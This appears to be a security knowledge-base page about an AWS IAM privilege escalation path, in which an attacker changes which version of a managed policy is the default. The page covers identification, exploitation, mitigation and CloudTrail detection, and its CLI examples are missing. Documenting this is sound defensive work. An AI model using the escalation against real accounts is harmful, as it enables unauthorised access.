AWS_CAN_SET_DEFAULT_POLICY_VERSION

Summary

Description

AWS_CAN_SET_DEFAULT_POLICY_VERSION represents the ability to change which version of a customer-managed IAM policy is active.

This is a dangerous escalation primitive because IAM evaluates only the default version of a managed policy. If an attacker can set default version, they can:

• Re-activate an old privileged version that still exists.

• Activate a malicious version created previously.

• Escalate every identity attached to that policy without modifying attachments.

This edge is commonly chained with AWS_CAN_CREATE_POLICY_VERSION.

Identification

AWS CLI

Check whether a principal can set default policy version:

List versions and current default:

AWS Console

• Open IAM -> Policies.

• Select target customer-managed policy.

• Open Policy versions and identify non-default versions.

• Confirm who can edit policy versions and switch default.

Exploitation

AWS CLI

Set an existing version as default:

If version v3 includes broader permissions than the current default, all attached principals immediately inherit those permissions.

Mitigation

• Restrict iam:SetDefaultPolicyVersion to minimal trusted identities.

• Regularly delete non-required old policy versions.

• Enforce review/approval for policy version switching.

• Apply SCP guardrails to prevent uncontrolled policy version activation.

Detection

Monitor CloudTrail for default version changes:

• Event source: iam.amazonaws.com

• Event name: SetDefaultPolicyVersion

Example lookup:

Correlate with CreatePolicyVersion events to detect full takeover chains.

References

• https://docs.aws.amazon.com/IAM/latest/APIReference/API_SetDefaultPolicyVersion.html

• https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-versioning.html

• https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/index.html